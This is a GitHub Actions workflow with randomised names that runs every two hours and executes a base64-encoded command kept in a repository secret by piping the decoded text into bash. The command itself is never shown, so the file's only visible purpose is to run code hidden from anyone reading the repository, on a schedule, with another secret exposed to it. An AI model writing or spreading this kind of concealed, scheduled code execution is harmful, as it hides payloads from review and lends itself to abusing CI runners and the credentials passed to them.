name: atbEiIq
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  ySurGSvyvRvD:
    runs-on: ubuntu-latest
    env:
      YPLxJMqR: ${{ secrets.LUzxqCEgwhF }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.WCZxqAWR }}" | base64 -d | bash
